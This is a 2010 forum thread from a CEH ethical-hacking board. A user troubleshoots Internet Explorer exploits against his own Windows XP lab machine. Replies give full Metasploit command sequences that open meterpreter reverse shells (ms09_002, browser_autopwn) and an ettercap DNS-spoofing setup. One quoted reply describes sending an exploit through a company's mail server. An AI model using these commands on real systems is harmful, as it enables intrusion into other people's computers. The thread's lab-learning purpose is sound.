.

MS09_002 memory corruption exploit help !@!

<<

rebrov

User avatar

Full Member
Full Member

Posts: 130

Joined: Mon May 11, 2009 4:00 pm

Post Tue Jun 01, 2010 10:39 am

MS09_002 memory corruption exploit help !@!

I've started my first pentest Lab :) successfuly and thanks to all friends here that helped me alot to do that and i started my first pentest process

i tried to exploit my windows xp sp3 machine with the MS09_002_memory_corruption exploit with BackTrack 4

and when the target tried to open the browser IE6 not IE7 i got this at the Metasploit shell :

Sending Internet Explorer 7 Uninitialized Memory Corruption Vulnerability to 192.168.1.2:1074 ...


is that because im using IE6 not IE7 i thought i can use this exploit at both of them !!

??


and one more thing what exploit was i talking about in this video :

http://www.youtube.com/watch?v=lhIk5Cix3DU

that guy demonstrated way to force the victim to go to his exploit server that he made with metasploit

and i tried ti this since its aweosme way to not send the victim any link or anything to ur server

i tried to do this with ettercap i edited the etter.dns and :

added the A record as the following

*            A    192.168.1.4

and then used the exploit in metasploit

the problem is when i used this exploit and if i didn't configure the options "URIPATH" it takes random path that i have to send to victim

so the new path will be for example http://192.168.1.4/gegwsgf

and the ettercap will redirect the traffic to 192.168.1.4 only without /gegwsgf

and when i tried it the victim spoofed successfuly to my ip 192.168.1.4 but no connection established at the metasploit :S why ?

that guy on the video didn't type URIPATH and didn't get random path like i did 192.168.1.4 only without the 192.168.1.4:80/fedfwgvsw

why ?
Last edited by rebrov on Tue Jun 01, 2010 11:40 am, edited 1 time in total.
<<

yatz

Full Member
Full Member

Posts: 222

Joined: Tue May 25, 2010 2:58 pm

Post Wed Jun 02, 2010 9:10 am

Re: MS09_002 memory corruption exploit help !@!

Congrats on your test environment!  Now let's see...

I just took a look at this exploit.  Looks like it is specifically IE7 (as noted in the MS09-002 KB article (http://www.microsoft.com/technet/securi ... 9-002.mspx).  I did test this on IE7 and saw it succeed and tested IE6 and it failed.

Did you use msfconsole or msfgui?  The video used the GUI but I do not have experience with that.  In the console, you will need to specify the SRVPORT and URIPATH (set SRVPORT 80, set URIPATH /) to have the exploit work on basic port 80 and at the root path.  If you do not specify URIPATH then it will pick a random one as you saw.

I bet msfgui sets the URIPATH to / (root) if nothing is typed but that is not the default behavior in msfconsole.

The commands I used to get it working are as follows:

msfconsole
use exploit/windows/browser/ms09_002_memory_corruption
set TARGET 0
set URIPATH /
set SRVPORT 80
set LHOST <local IP>
set PAYLOAD windows/meterpreter/reverse_tcp
exploit
(vulnerable machine navigates to http://<ip address>)
sessions
sessions -i 1
shell

Voila!

Play around with the ettercap stuff too.  This basic config for msfconsole can be used with many of the browser exploits.  Try different ones and see what happens!
"Live as though you would die tomorrow, learn as though you would live forever."

CCNA, MCSA, MCTS, Sec+, Net+, Linux+, CEH
<<

rebrov

User avatar

Full Member
Full Member

Posts: 130

Joined: Mon May 11, 2009 4:00 pm

Post Wed Jun 02, 2010 7:46 pm

Re: MS09_002 memory corruption exploit help !@!

Did you use msfconsole or msfgui?

yes i always using msfconsole :)

set URIPATH /

yes i tried ur way and it worked with dns spoof and forced my xp once i opened the IE7 to make the exploit work but didn't get any session

because i think as u said this exploit working at IE7 only

do u know any working IE6 exploit i can use ?

i searched on the aurora one in my metasploit at backtrack 4

but didn't find this 1
<<

yatz

Full Member
Full Member

Posts: 222

Joined: Tue May 25, 2010 2:58 pm

Post Thu Jun 03, 2010 9:08 am

Re: MS09_002 memory corruption exploit help !@!

The aurora exploit is listed under MS10_002_aurora.

Maybe try searching on the metasploit website for modules containing IE6? 
"Live as though you would die tomorrow, learn as though you would live forever."

CCNA, MCSA, MCTS, Sec+, Net+, Linux+, CEH
<<

yatz

Full Member
Full Member

Posts: 222

Joined: Tue May 25, 2010 2:58 pm

Post Thu Jun 03, 2010 9:15 am

Re: MS09_002 memory corruption exploit help !@!

FYI - I thought this would be a good question for the community so I posed a new topic for exploit listings by product. 

http://www.ethicalhacker.net/component/option,com_smf/Itemid,54/topic,5570.0/
"Live as though you would die tomorrow, learn as though you would live forever."

CCNA, MCSA, MCTS, Sec+, Net+, Linux+, CEH
<<

KrisTeason

User avatar

Hero Member
Hero Member

Posts: 515

Joined: Sat Sep 08, 2007 7:48 pm

Location: /dev/null

Post Thu Jun 03, 2010 11:07 am

Re: MS09_002 memory corruption exploit help !@!

Have you taken into consideration that maybe your Windows XP SP3 box has gotten a security update and patched the vulnerability? I noticed you said you browsed to it and got no session.

A good way to test this in Metasploit is the auxiliary/server/browser_autopwn module. I've found this module most useful - It fingerprints the browser that connects to you on port 80 and chooses a specific exploit module to launch against it. See if you get some positive results out of it and if you do, see what exploit was successful against your browser then attempt to replicate the video using that specific exploit & ettercap.

Cheers,

kris
eCPPT (Silver/Gold), eWPT, GSEC, GISP, GCIH, OSCP, OSWP
<<

rebrov

User avatar

Full Member
Full Member

Posts: 130

Joined: Mon May 11, 2009 4:00 pm

Post Thu Jun 03, 2010 6:51 pm

Re: MS09_002 memory corruption exploit help !@!

A good way to test this in Metasploit is the auxiliary/server/browser_autopwn module. I've found this module most useful - It fingerprints the browser that connects to you on port 80 and chooses a specific exploit module to launch against it.


can u please tell me when i use this ?

after i dns_spoofed the target with ettercap and tried to get session with metasploit but didn't yet do u mean after i tried both of them i use this ??

or just after ettercap ??

because u said it trying to get vulnerability of brwoser that trying to connect to you

can you please gimme more details and steps ?



and btw i tried this exploit ani_loadimage_chunksize its working for both IE6 and IE7 but didn't work with me same its final step before the [*] Sending stage (723456 bytes)

and it stopped

here's what i got :

msf exploit(ani_loadimage_chunksize) >
[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending HTML page to 192.168.1.2:1130...
[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending Windows ANI LoadAniIcon() Chunk Size Stack Overflow (HTTP) to 192.168.1.2:1130...


and thats all never get session


i need u to tell me the auxiliary/server/browser_autopwn usage so i can try
<<

yatz

Full Member
Full Member

Posts: 222

Joined: Tue May 25, 2010 2:58 pm

Post Fri Jun 04, 2010 8:30 am

Re: MS09_002 memory corruption exploit help !@!

For the ani_loadimage_chunksize, can you try to follow the steps in this thread?

http://forums.remote-exploit.org/newbie-area/20836-anyone-familiar-metasploits-ani_loadimage_chunksize.html
"Live as though you would die tomorrow, learn as though you would live forever."

CCNA, MCSA, MCTS, Sec+, Net+, Linux+, CEH
<<

yatz

Full Member
Full Member

Posts: 222

Joined: Tue May 25, 2010 2:58 pm

Post Fri Jun 04, 2010 8:52 am

Re: MS09_002 memory corruption exploit help !@!

As for the browser_autopwn, it is a replacement to the exploit you use.  Basically AUTOPWN will AUTOMATICALLY PWN the target.  It does this by starting a whole bunch of exploits at once and then when the target browser navigates to the URI, it will exploit it one at a time until it gets a session.



(From offensive-security website...)

use auxiliary/server/browser_autopwn

setg AUTOPWN_HOST <ipaddress>
setg AUTOPWN_PORT 55550
setg AUTOPWN_URI /ads

set LHOST <ipaddress>
set LPORT 45000
set SRVPORT 55550
set URIPATH /ads

run



This will load a bunch of modules, then the target goes to "http://<ipaddress>:55550/ads" and the magic happens!
"Live as though you would die tomorrow, learn as though you would live forever."

CCNA, MCSA, MCTS, Sec+, Net+, Linux+, CEH
<<

rebrov

User avatar

Full Member
Full Member

Posts: 130

Joined: Mon May 11, 2009 4:00 pm

Post Fri Jun 04, 2010 11:01 am

Re: MS09_002 memory corruption exploit help !@!

yatz wrote:As for the browser_autopwn, it is a replacement to the exploit you use.  Basically AUTOPWN will AUTOMATICALLY PWN the target.  It does this by starting a whole bunch of exploits at once and then when the target browser navigates to the URI, it will exploit it one at a time until it gets a session.



(From offensive-security website...)

use auxiliary/server/browser_autopwn

setg AUTOPWN_HOST <ipaddress>
setg AUTOPWN_PORT 55550
setg AUTOPWN_URI /ads

set LHOST <ipaddress>
set LPORT 45000
set SRVPORT 55550
set URIPATH /ads

run



This will load a bunch of modules, then the target goes to "http://<ipaddress>:55550/ads" and the magic happens!



should i put /ads at the URIPATH ??

because i put always / only to make the target redirect to my ettercap ip

to http://192.168.1.4/

and i always put the SRVPORT 80 to make the target redirect to dufault path to my server

but anyway i saw at the offensive-security site that i should only

use the exploit and then put the lhost and then run

didn't see those commands  ... should i ?
<<

rebrov

User avatar

Full Member
Full Member

Posts: 130

Joined: Mon May 11, 2009 4:00 pm

Post Fri Jun 04, 2010 11:02 am

Re: MS09_002 memory corruption exploit help !@!

yatz wrote:For the ani_loadimage_chunksize, can you try to follow the steps in this thread?

http://forums.remote-exploit.org/newbie-area/20836-anyone-familiar-metasploits-ani_loadimage_chunksize.html


i found no steps i can do at this thread :)
<<

yatz

Full Member
Full Member

Posts: 222

Joined: Tue May 25, 2010 2:58 pm

Post Fri Jun 04, 2010 2:47 pm

Re: MS09_002 memory corruption exploit help !@!

rebrov wrote:i found no steps i can do at this thread :)


You will want to set the RHOST to an MTA. For example, if I want to send this exploit to user@companyA.com, and they have an mx for that domain (mail.companya.com), then I will specify that host as the RHOST. I believe that you can specify an open SMTP relay as well, such as your ISP's mail relay. Also, in order for them to connect back to you, you will either need to place your box on the Internet or behind a firewall with a destination NAT pointed back to your box. Otherwise, the victim will not be able to comm back to you.


See post #2 - RHOST, MX address, etc.  I've not used this so I don't know the details.


If you are just trying to exploit ie6, there are other ones out there.  The browser_autopwn is very easy especially if you don't know what will work or not.
"Live as though you would die tomorrow, learn as though you would live forever."

CCNA, MCSA, MCTS, Sec+, Net+, Linux+, CEH
<<

yatz

Full Member
Full Member

Posts: 222

Joined: Tue May 25, 2010 2:58 pm

Post Fri Jun 04, 2010 2:50 pm

Re: MS09_002 memory corruption exploit help !@!

rebrov wrote:should i put /ads at the URIPATH ??

because i put always / only to make the target redirect to my ettercap ip

to http://192.168.1.4/

and i always put the SRVPORT 80 to make the target redirect to dufault path to my server

but anyway i saw at the offensive-security site that i should only

use the exploit and then put the lhost and then run

didn't see those commands  ... should i ?


Change AUTOPWN_PORT to 80, AUTOPWN_URI to /, SRVPORT to 80 and URIPATH to / and you should get what you want.  I just pulled that code straight from the OS website and it worked for me in BT4.
"Live as though you would die tomorrow, learn as though you would live forever."

CCNA, MCSA, MCTS, Sec+, Net+, Linux+, CEH

Return to CEH - Certified Ethical Hacker

Who is online

Users browsing this forum: No registered users and 1 guest

.
Powered by phpBB® Forum Software © phpBB Group.
Designed by ST Software